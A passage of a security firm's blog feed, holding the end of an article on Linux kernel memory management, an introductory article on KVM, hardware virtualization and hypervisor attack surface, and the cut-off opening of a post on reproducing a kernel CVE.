regular use, and an &lt;em&gt;inactive&lt;/em&gt; list for pages that have gone cold. A page that stops being touched slowly drifts from active to inactive, and the inactive list is exactly where kswapd goes shopping for things to evict. (It keeps separate lists for anonymous memory and for file-backed page-cache pages, since the two are reclaimed in different ways. The kernel can also be built to use &lt;strong&gt;Multi-Gen LRU&lt;/strong&gt;, which sorts pages into several finer-grained &lt;em&gt;generations&lt;/em&gt; by age, but the goal is the same: find the coldest pages.)&lt;/p&gt;&lt;p&gt;Once kswapd picks a cold page, what happens next depends on what kind of page it is:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;A clean file-backed page&lt;/strong&gt; — just drop it. The original is still sitting on disk, so it can be read back later if anyone needs it.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;A dirty file-backed page&lt;/strong&gt; — write the changes back to disk first, &lt;em&gt;then&lt;/em&gt; drop it.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;An anonymous page&lt;/strong&gt; (heap or stack — nothing on disk to fall back on) — ship it off to the annex: write it out to swap, leave a note in the page-table entry saying “this one’s at the annex,” and free the page.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Later, if a process reaches for a page that got shipped off to swap, it simply faults. The librarian spots the “at the annex” note, &lt;code&gt;do_swap_page()&lt;/code&gt; fetches the page back from disk, and the program carries on none the wiser — just a little slower for that one access.&lt;/p&gt;&lt;p&gt;And if even swap fills up and there’s truly nothing left to reclaim? The library’s last resort is to throw a reader out completely. That’s the &lt;strong&gt;OOM (Out-Of-Memory) killer&lt;/strong&gt; (&lt;a href=&quot;https://github.com/torvalds/linux/blob/v7.0/mm/oom_kill.c&quot;&gt;&lt;code&gt;mm/oom_kill.c&lt;/code&gt;&lt;/a&gt;): it looks over the killable processes, scores them mostly by memory footprint while respecting policy knobs like &lt;code&gt;oom_score_adj&lt;/code&gt;, and kills the worst candidate. It’s brutal, but losing one process beats the whole machine locking up.&lt;/p&gt;&lt;p&gt;That’s the kernel reclaiming memory under duress. Most of the time, though, memory is handed back far more peacefully — by the programs that asked for it in the first place.&lt;/p&gt;&lt;h2&gt;Freeing Memory: Returning Pages to the Pool&lt;/h2&gt;&lt;p&gt;Here’s the surprise: calling &lt;code&gt;free()&lt;/code&gt; usually doesn’t return anything to the kernel — the C library just keeps it in its own free-list to reuse for your next &lt;code&gt;malloc()&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Pages only really go back when a whole region is torn down (a &lt;code&gt;munmap()&lt;/code&gt;, or the process exiting). Even then, a page is freed only once the &lt;em&gt;last&lt;/em&gt; user lets go — its reference count hits zero — because copy-on-write and shared mappings mean several processes can point at the same page. When that count reaches zero, the page returns to the buddy allocator, ready to be handed out again.&lt;/p&gt;&lt;p&gt;That’s every piece of the machine on its own. The best way to make them stick is to watch them work together — so let’s trace, step by step, what happens behind a few ordinary lines of C.&lt;/p&gt;&lt;h2&gt;End-to-End: From &lt;code&gt;malloc()&lt;/code&gt; to First Write&lt;/h2&gt;&lt;p&gt;We’ll start with the simplest thing of all: allocate some memory and write to it.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;malloc(4096)&lt;/code&gt;.&lt;/strong&gt; Remember that &lt;code&gt;malloc&lt;/code&gt; lives in the C library, not the kernel. If the C library already has spare space in its own heap, it may not call the kernel at all. But when it does need more room, it asks the kernel for raw address space (with &lt;code&gt;brk()&lt;/code&gt; or &lt;code&gt;mmap()&lt;/code&gt;), and the normal response is cheap: the kernel extends or adds an anonymous &lt;strong&gt;VMA&lt;/strong&gt; — a promise covering that range of addresses. No physical memory is touched yet. So when &lt;code&gt;malloc&lt;/code&gt; hands back &lt;code&gt;buf&lt;/code&gt;, the address is valid but may have &lt;strong&gt;nothing behind it&lt;/strong&gt;: no page-table entry, no physical page.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;code&gt;buf[0] = &amp;#39;A&amp;#39;&lt;/code&gt;.&lt;/strong&gt; Now you write, and that’s when the promise gets cashed in. The CPU asks the MMU to translate the address, the MMU walks the page tables, finds no entry there — and raises a &lt;strong&gt;page fault&lt;/strong&gt;. That rings the bell for the librarian: the fault handler finds the VMA covering the address, confirms it’s writable, and sees this is a fresh anonymous page that needs filling in. So it grabs a free page from the buddy allocator, often through the per-CPU cache, wipes it clean, and installs a page-table entry pointing at it.&lt;/p&gt;&lt;p&gt;The faulting instruction restarts, and this time the translation succeeds — &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt; lands on the shelf. Every later access to that page sails straight through the TLB and costs nothing extra. That’s &lt;strong&gt;demand paging&lt;/strong&gt;: the page was just a promise until the exact moment you touched it.&lt;/p&gt;&lt;p&gt;Allocating and writing is the simple case. It gets more interesting when a process forks and parent and child end up sharing memory.&lt;/p&gt;&lt;h2&gt;End-to-End: &lt;code&gt;fork()&lt;/code&gt; and Copy-on-Write&lt;/h2&gt;&lt;p&gt;When &lt;code&gt;fork()&lt;/code&gt; is called, the child gets a copy of the parent’s address space — but, as we saw, the kernel doesn’t actually copy the memory. Instead it points the child’s page tables at the &lt;strong&gt;same physical pages&lt;/strong&gt; the parent is using, and marks every writable private page &lt;strong&gt;read-only&lt;/strong&gt; in both. As long as both processes only read, they share the same books happily, with no faults at all.&lt;/p&gt;&lt;p&gt;The moment the child writes, the trap springs. &lt;code&gt;buf[0] = &amp;#39;B&amp;#39;&lt;/code&gt; lands on a read-only page, so the CPU raises a &lt;strong&gt;protection fault&lt;/strong&gt;. The librarian recognizes this as &lt;strong&gt;copy-on-write&lt;/strong&gt;: it grabs a fresh page from the buddy allocator, photocopies the parent’s page into it (still holding &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt;), repoints the child’s page-table entry at the copy, and makes it writable again. It also drops one reference on the original, since the parent still holds it.&lt;/p&gt;&lt;p&gt;Now each side has its own page — the parent’s untouched with &lt;code&gt;&amp;#39;A&amp;#39;&lt;/code&gt;, the child’s a private copy with &lt;code&gt;&amp;#39;B&amp;#39;&lt;/code&gt;. Only the single page that was actually written ever got duplicated.&lt;/p&gt;&lt;p&gt;Anonymous memory is only half the story. Mapping a &lt;em&gt;file&lt;/em&gt; into the address space runs the same machinery with one twist: where the page comes from.&lt;/p&gt;&lt;h2&gt;End-to-End: &lt;code&gt;mmap()&lt;/code&gt; a File&lt;/h2&gt;&lt;p&gt;With an ordinary lazy file mapping, &lt;code&gt;mmap()&lt;/code&gt; does almost nothing up front, just like &lt;code&gt;malloc&lt;/code&gt;. The kernel creates a &lt;strong&gt;VMA&lt;/strong&gt; for the range — but this time it labels it with &lt;em&gt;which file&lt;/em&gt; backs it: “the books here come from &lt;code&gt;data.bin&lt;/code&gt;.” The address &lt;code&gt;p&lt;/code&gt; comes back right away, with no I/O and no page allocated yet.&lt;/p&gt;&lt;p&gt;The first read, &lt;code&gt;p[0]&lt;/code&gt;, faults — the same bell as always. The only difference is what the librarian does about it. Instead of handing back a blank page, it sees the VMA is file-backed and fetches the right page from the file: it reads it from the &lt;strong&gt;page cache&lt;/strong&gt; (the kernel’s in-memory copy of recently-used file data), or from disk if it isn’t cached yet. That page gets wired into a page-table entry, and the read completes.&lt;/p&gt;&lt;p&gt;What happens on a &lt;em&gt;write&lt;/em&gt; depends on how you mapped the file, assuming the mapping was created with &lt;code&gt;PROT_WRITE&lt;/code&gt;. With &lt;code&gt;MAP_PRIVATE&lt;/code&gt; the page starts out protected from direct modification, so writing to it triggers a &lt;strong&gt;copy-on-write&lt;/strong&gt; fault — the page is photocopied to a private page and your change goes to the copy, leaving the file untouched. With &lt;code&gt;MAP_SHARED&lt;/code&gt;, writes land directly in the page cache, and the kernel writes those dirty pages back to the file later on.&lt;/p&gt;&lt;p&gt;With those three traces, we’ve watched every piece of the machine work together. Here’s the whole picture in one place.&lt;/p&gt;&lt;h2&gt;Summary&lt;/h2&gt;&lt;p&gt;Let’s put the library back together. Every address a program uses is virtual, and the &lt;strong&gt;MMU&lt;/strong&gt; translates it on every access by walking the process’s &lt;strong&gt;page tables&lt;/strong&gt; (up to five levels, rooted at &lt;code&gt;CR3&lt;/code&gt;), with hot translations cached in the &lt;strong&gt;TLB&lt;/strong&gt;. Underneath, each 4 KB page has a &lt;code&gt;struct page&lt;/code&gt; record; pages are sorted into &lt;strong&gt;zones&lt;/strong&gt; and &lt;strong&gt;NUMA nodes&lt;/strong&gt;, and the &lt;strong&gt;buddy allocator&lt;/strong&gt; hands them out in power-of-two runs, fronted by a per-CPU cache that avoids the zone lock in the common case. On top of it, the kernel’s own allocators carve pages up further — SLUB lines a page with same-sized objects (one shelf, many identical books) for its tiny internal structures, while vmalloc stitches scattered pages into one contiguous virtual range.&lt;/p&gt;&lt;p&gt;User space gets its own view: an &lt;code&gt;mm_struct&lt;/code&gt; with a tree of &lt;strong&gt;VMAs&lt;/strong&gt;, each a labeled range of addresses. VMAs are just promises, though — real pages appear only when the program touches an address and trips a &lt;strong&gt;page fault&lt;/strong&gt;, where the librarian provides a blank page, reads one from a file, or photocopies a shared one (&lt;strong&gt;copy-on-write&lt;/strong&gt;). This &lt;strong&gt;demand paging&lt;/strong&gt; is what lets a process reserve gigabytes while consuming only what it touches. Memory flows back the same way: under pressure &lt;strong&gt;kswapd&lt;/strong&gt; ages pages through LRU lists and reclaims the coldest ones, dropping file-cache pages or pushing anonymous pages to &lt;strong&gt;swap&lt;/strong&gt;, with the &lt;strong&gt;OOM killer&lt;/strong&gt; as last resort; otherwise a page returns to the buddy allocator once its region is gone and its last reference drops.&lt;/p&gt;&lt;p&gt;That’s the memory manager: one mechanism giving every process its own private, lazily-filled view of a finite pile of physical RAM. The next article turns to the part of the kernel that decides &lt;em&gt;who gets to run, and when&lt;/em&gt; — the &lt;strong&gt;scheduler&lt;/strong&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Exploring NVIDIA Linux Drivers Internals Basics &amp; IOCTLs</title>
<link>https://fuzzinglabs.com/exploring-nvidia-linux-drivers-internals-basics-ioctls/</link>
<guid isPermaLink="false">J0Z6eCusZ3LqFt1qS3wEauCV3XkZOHJ01lF7ww==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:27 +0000</pubDate>
<description>Exploring Linux &amp; NVIDIA Drivers NVIDIA Linux Drivers Internals Basics Introduction In this post we will talk about nvidia’s open source linux drivers internals and basic concepts. Back in 2022, NVIDIA released its drivers as open source, and for the security and tech community in general, this is good news; this allows us to understand...</description>
<content:encoded>Exploring Linux &amp;amp; NVIDIA Drivers NVIDIA Linux Drivers Internals Basics Introduction In this post we will talk about nvidia’s open source linux drivers internals and basic concepts. Back in 2022, NVIDIA released its drivers as open source, and for the security and tech community in general, this is good news; this allows us to understand...</content:encoded>
</item>
<item>
<title>Introduction To KVM &amp; Hardware Virtualization​</title>
<link>https://fuzzinglabs.com/introduction-to-kvm-hardware-virtualization/</link>
<enclosure type="image/jpeg" length="0" url="https://fuzzinglabs.com/wp-content/uploads/2025/08/image-12.png"></enclosure>
<guid isPermaLink="false">JoXiUdrWYCM9zq5xaLirXBEmWVwAmMJIBQ4F_A==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:27 +0000</pubDate>
<description>Step into virtualization with KVM. This guide introduces hypervisors and explores the unique architecture and security of the Linux kernel.</description>
<content:encoded>&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Virtualization has become a huge part in production environments, in traditional IT or in the cloud, improving security, development cycles and maintenance. This technology is the cornerstone that allows us to build isolated sandboxes, drastically shorten the time it takes to provision new servers, and perform hardware maintenance with zero downtime through live migration. It also creates a whole new attack surface, that we’ll be introducing in this post.&lt;/p&gt;&lt;p&gt;At the heart of this capability lies the hypervisor, the software that creates and manages virtual machines. In the vast ecosystem powered by Linux, one solution stands out for its deep integration and performance: KVM. As a core feature of the Linux kernel itself, KVM effectively turns the operating system into a powerful, native hypervisor, establishing it as a foundational building block for a majority of today’s cloud platforms and virtualized data centers.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Hypervisors and their different types&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;A hypervisor, or Virtual Machine Monitor (VMM), is the software that creates and runs virtual machines. There are two main types of hypervisors:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;Type 1 (Bare-Metal) Hypervisors&lt;/strong&gt;: These run directly on the host’s hardware, acting as a lightweight operating system. They have direct access to the system’s resources and are generally more performant and secure. Examples include VMware ESXi, and Microsoft Hyper-V.&lt;/li&gt;&lt;li&gt;&lt;strong&gt;Type 2 (Hosted) Hypervisors&lt;/strong&gt;: These run as an application on top of a conventional operating system. They are easier to set up and manage but introduce more overhead as they have to go through the host OS to access the hardware. Examples include VMware Workstation, Oracle VirtualBox, and QEMU.&lt;/li&gt;&lt;/ul&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm1-1024x422.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;Two types of Hypervisors, from Saferwall blog&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;These two categories are not really well defined : KVM, being a part of the Linux Kernel, is kind of in-between the two, so a sort of type 1 and a half hypervisor. Also note that VMware Workstation and VirtualBox also push modules into the kernel, so they could be considered one and three quarter type hypervisors.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;A Brief View of Virtualization techniques&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;1- Full Binary Emulation&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Full Binary Emulation is a powerful virtualization method that allows a host system to run a completely unmodified guest operating system, even one from a different CPU architecture.&lt;/p&gt;&lt;p&gt;The process is called Binary Translation (BT), where the emulator dynamically translates blocks of guest machine code (e.g., ARM) into instructions the host CPU (e.g., x86-64) can execute. This technique offers a strong security advantage: the entire guest environment runs inside a single, unprivileged userspace process on the host. Its main drawback behind its slowness.&lt;/p&gt;&lt;p&gt;Its ability to run cross-architecture code remains its defining feature. This technology is central to modern tools like QEMU, which uses its TCG IR (Intermediate Representation) for this translation.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm2.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;QEMU TCG Diagram from curiouslearnerblog&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;2- Paravirtualization&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;To overcome the performance limitations of full emulation, paravirtualization was introduced.&lt;/p&gt;&lt;p&gt;This technique requires modifying the guest operating system’s kernel to make it aware that it is running in a virtualized environment. By doing so, the guest can directly communicate with the hypervisor, eliminating the need for complex emulation of hardware devices. VirtIO is a standard for paravirtualized devices, providing a set of common features for network, block, and other devices. vhost is a kernel-level backend for VirtIO that further improves performance by moving the virtio backend into the guest kernel. You can dive deeper into paravirtualization with &lt;a href=&quot;https://www.redhat.com/en/blog/virtio-devices-and-drivers-overview-headjack-and-phone&quot;&gt;this RedHat article&lt;/a&gt;.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm3.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;VirtIO blogpost from RedHat&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;3- Hardware Virtualization&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;The real game-changer for virtualization was the introduction of hardware support from CPU vendors.&lt;/p&gt;&lt;p&gt;The idea is to move security boundaries from software to the CPU itself (hence hardware-assisted virtualization), to enable the guest to run on the CPU itself, achieving near native speeds. The hypervisor’s role is reduced to managing the virtual machines and providing them with access to the physical hardware.&lt;/p&gt;&lt;p&gt;Intel’s VT (technical name VMX) and AMD’s AMD-V (technical names SVM/SEV) are sets of x86 processor extensions that enable the secure hardware-assisted emulation. ARM also provides virtualization extensions in its architecture. This technology significantly improves performance and allows for the virtualization of unmodified operating systems, including proprietary ones like Windows.&lt;/p&gt;&lt;p&gt;The introduction of additional hardware features, such as the IOMMU or TDP (generic term for two-dimensional paging, or nested paging, EDP for Intel, NPT for AMD), further enhanced the near-native performances.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Harware virtualization overview&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Note : This section evokes CPU features such as MSRs, MMIO, APICs. If you are not familiar and would like to read on these topics, you may enjoy Ayoub Faouzi’s &lt;a href=&quot;https://github.com/ayoubfaouzi/cpu-internals&quot;&gt;CPU Internals&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;Let’s give a generic overview of how the VM running loop works on the hardware side. Although the vocabulary I’ll be using might change depending on implementation (AMD, Intel, ARM), the ideas pretty much stay the same.&lt;/p&gt;&lt;p&gt;The kernel (Virtualization instructions are privileged) asks the CPU to run a VM. This is done by providing beforehand the data needed to run the VM.&lt;/p&gt;&lt;p&gt;The CPU performs a “VMENTER”, and the VM runs on the raw CPU, but in its own “world” (different address space, etc), until it tries to execute an instruction that could break a security bundary (accessing a non-existing address, changing an MSR, addressing MMIO/PIO, etc).&lt;/p&gt;&lt;p&gt;When such an event happens, the CPU performs a VMEXIT and returns to the hypervisor, providing it with the VMEXIT reason and additional data. The hypervisor is charged to solve this exception anyway how it would see fit (emulate the instruction, pass the MMIO access to QEMU to let it emulate a network card, create a new address range for the VM, etc).&lt;/p&gt;&lt;p&gt;When the exception has been resolved, another VMENTER can be performed, resuming the VM execution, the exception having been transparently solved. To the VM, it seems nothing happened, and the instruction was correctly executed.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h3&gt;Getting into x86 &amp;amp; AMD’s SVM specifics&lt;/h3&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;So far, we have been largely architecture-independent.. We will now dive into the x86 AMD implementation (although Intel’s is pretty close to AMD’s).&lt;/p&gt;&lt;p&gt;AMD’s AMD-V extension provides several instructions to work with virtualization. Amongst them is VMRUN, the instruction which performs the VMENTER. It expects in RAX the physical address of the VMCB, a 0x1000-byte structure that holds the configuration of the VM, created by the hypervisor (Intel doesn’t have such a struct, rather uses VMREAD/VMWRITE instructions to deal with this configuration in a blackbox way)&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm4.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;A piece of the VMCB, as defined in arch/x86/include/asm/svm.h&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;In the VMCB, notable fields are :&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Intercept vectors : tell the CPU wether a specific instruction must be intercepted and result in a VMEXIT&lt;/li&gt;&lt;li&gt;Exit infos : filled by the CPU on VMEXIT to inform the hypervisor of the causes of the VMEXIT&lt;/li&gt;&lt;li&gt;VM registers : the registers of the vCPU, updated upon VMEXIT by the CPU&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;SVM (Secure Virtual Machine, the technical name of AMD-V) also provides MSRs (Model Specific Registers) to configure the extension. Among them, a bit in &lt;code&gt;EFER&lt;/code&gt; controls the activation of the virtualization extension, or the &lt;code&gt;VM_HSAVE_PA&lt;/code&gt; MSR which (AMD Manual)&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;holds the physical address of a 4KB block of memory where VMRUN saves host state, and from which #VMEXIT reloads host state. The VMM software is expected to set up this register before issuing the first VMRUN instruction.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;If you want more detail about the VMCB layout, to explore more in depth the technology, you can find it in the AMD64 Manual, Vol. 2 under &lt;code&gt;Appendix B VMCB Layout&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;Note : if you’d rather dive into Intel’s implementation, you can check out daax’s &lt;a href=&quot;https://revers.engineering/7-days-to-virtualization-a-series-on-hypervisor-development/&quot;&gt;5 Days to Virtualization: A Series on Hypervisor Development&lt;/a&gt;&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;The Linux Hypervisor : KVM&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;KVM (stands for Kernel Virtual Machines) is the Linux kernel hypervisor, meaning integrated in the Linux kernel. It does not however run the host Linux kernel, as Hyper-V VBS does for Windows.&lt;/p&gt;&lt;p&gt;As it is used in the AWS &amp;amp; Google Cloud architectures, and has a very unique attack surface mixing software and hardware, KVM is a very important target to properly secure.&lt;/p&gt;&lt;p&gt;Google for instance is very keen on securing it, providing the &lt;a href=&quot;https://github.com/google/security-research/blob/master/kvmctf/rules.md&quot;&gt;kvmCTF&lt;/a&gt; with a $250,000 reward for a full x86 Intel escape. They are also doing hardening – &lt;a href=&quot;https://cloud.google.com/blog/products/gcp/7-ways-we-harden-our-kvm-hypervisor-at-google-cloud-security-in-plaintext&quot;&gt;7 ways we harden our KVM hypervisor at Google Cloud&lt;/a&gt; – and security research on KVM (Felix Wilhelm’s &lt;a href=&quot;https://googleprojectzero.blogspot.com/2021/06/an-epyc-escape-case-study-of-kvm.html&quot;&gt;An EPYC escape: Case-study of a KVM breakout&lt;/a&gt;).&lt;/p&gt;&lt;h3&gt;Specificity&lt;/h3&gt;&lt;p&gt;KVM as a hypervisor is specific in the sense that it only provides an API to create VMs. It does not work out of the box, it needs a userland process to manage the VMs (VMM). That’s why you’ll often find KVM in your favorite VMM under the “accelerator” option.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm5.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;KVM VM Running Loop&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;With Qemu as the VMM, it’s traditionally called Qemu/KVM, with the option &lt;code&gt;-cpu host -enable-kvm&lt;/code&gt;, and replaces TCG. It can also be used with libvirt or as an accelerator for VirtualBox. Cloud providers tend to avoid using Qemu/KVM because of its overhead and huge attack surface with its emulated devices. Amazon for instance developed &lt;a href=&quot;https://firecracker-microvm.github.io/&quot;&gt;Firecracker&lt;/a&gt; for efficient and safe microVM management.&lt;/p&gt;
&lt;p&gt;KVM exposes to userland a set of IOCTLs to create and manage virtual machines. Its role is only to manage the emulation features that require hardware privileged access, and act as a bridge between the VMs and the userland VMM.&lt;/p&gt;
&lt;h3&gt;Attack surface&lt;/h3&gt;
&lt;p&gt;As with any software, analyzing and reducing the attack surface is paramount to its security. Being “only” an API to create VMs, and not handling hardware emulation or the likes (copy-paste, etc), KVM attack surface is quite small, specific and interesting.&lt;/p&gt;
&lt;p&gt;The threat-model for hypervisor generically considers that the attacker controls the guest kernel (by being root or exploiting an LPE). It asks : Can the attacker take control of the Host from the Guest kernel (VM Escape) ?&lt;/p&gt;
&lt;p&gt;The usual approach to this is exploiting QEMU (the VMM) vulnerabilities, resulting in a host userland takeover. As I’ve said, AWS have been reducing this surface by creating Firecracker (notably in Rust – but not bug-proof, see this &lt;a href=&quot;https://chomp.ie/Blog+Posts/Attacking+Firecracker+-+AWS&amp;#39;+microVM+Monitor+Written+in+Rust&quot;&gt;chompie article&lt;/a&gt;). However, KVM per se residing in the kernel, a successful KVM exploitation would result in host kernel exploitation.&lt;/p&gt;
&lt;p&gt;The VM is allowed to run free, unless a VMEXIT is triggered. When this happens, KVM must react to it to allow the VM to run seamlessly. The attack surface is then all the actions the guest (kernel) could take that would result in a VMEXIT and KVM logic being triggered.&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
															&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm6.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;															&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Such an interaction could be the hypercall interface, akin to what syscalls are between userland and kernel-land. In a paravirtualization setup, when the guest is aware it is run inside a hypervisor, it may use (for AMD) the &lt;code&gt;VMMCALL&lt;/code&gt;instruction to perform a hypercall. KVM only provides very few hypercalls (&lt;a href=&quot;https://docs.kernel.org/virt/kvm/x86/hypercalls.html&quot;&gt;x86 has 6 active&lt;/a&gt;), so this particular attack surface is very limited. Other examples involve emulated instructions, particular CPU modes (SMM), nested virtualization (will be explored in the nexts blogposts !), MSRs access, etc.&lt;/p&gt;&lt;p&gt;Note : For the purpose of paravirtualization, KVM sets CPUID 0x40000000 to &lt;code&gt;KVMKVMVKM&lt;/code&gt; to inform the guest of the paravirtualization (in &lt;code&gt;arch/x86/include/uapi/asm/kvm_para.h&lt;/code&gt;).&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
												&lt;figure&gt;
										&lt;img src=&quot;https://fuzzinglabs.com/wp-content/uploads/2025/08/kvm7.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;											&lt;figcaption&gt;KVM signature&lt;/figcaption&gt;
										&lt;/figure&gt;
									&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Another KVM attack surface is hardware configuration : since a lot of security boundaries are delegated to the CPU, the VM security configuration must be configured right to avoid security violations. For instance, the AMD VMCB contains a MSR bitmap intercept field, which tells the CPU which MSR read/write must be intercepted. Failure to properly handle these configurations will result in VM escape, as shown by Felix Wilhelm in the before-mentioned P0 article (exploiting a TOCTOU in nested virtualization to create an overly-privileged VM with arbitrary MSR read/write, and use it to take control of the host).&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;Conclusion&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;This concludes this first part and introduction to hardware virtualization and KVM. The next part(s) will be dedicated to the KVM debugging setup, and the creation of a nested virtualization fuzzer.&lt;/p&gt;&lt;p&gt;Stay tuned !&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Antoine Assier de Pompignan – Gravis&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
					&lt;h2&gt;About Us&lt;/h2&gt;				&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
							&lt;div&gt;
			&lt;span&gt;
						&lt;/span&gt;
		&lt;/div&gt;
						&lt;/div&gt;
				&lt;/div&gt;&lt;div&gt;
				&lt;div&gt;
									&lt;p&gt;Founded in 2021 and headquartered in Paris, &lt;strong&gt;FuzzingLabs&lt;/strong&gt; is a cybersecurity startup specializing in &lt;strong&gt;vulnerability research, fuzzing, and blockchain security&lt;/strong&gt;. We combine cutting-edge research with hands-on expertise to secure some of the most critical components in the blockchain ecosystem.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://fuzzinglabs.com/contact&quot;&gt;Contact us&lt;/a&gt; for an audit or long term partnership!&lt;/p&gt;								&lt;/div&gt;
				&lt;/div&gt;</content:encoded>
</item>
<item>
<title>Reproducing CVE-2026-23111: How One Character Can Change Everything</title>
<link>https://fuzzinglabs.com/repro-cve-2026-23111/</link>
<enclosure type="image/jpeg" length="0" url="https://fuzzinglabs.com/wp-content/uploads/2026/04/image.png"></enclosure>
<guid isPermaLink="false">UgZn9HlkNrm6Wq078_5ZT5XKME9xr793wMcgEQ==</guid>
<pubDate>Tue, 23 Jun 2026 21:58:25 +0000</pubDate>
<description>Reproducing CVE-2026-23111: a single inverted condition in nf_tables leads to UAF, leaks, ROP chain, and full Linux kernel privilege escalation.</description>
<content:encoded>&lt;div&gt;
				&lt;div&gt;
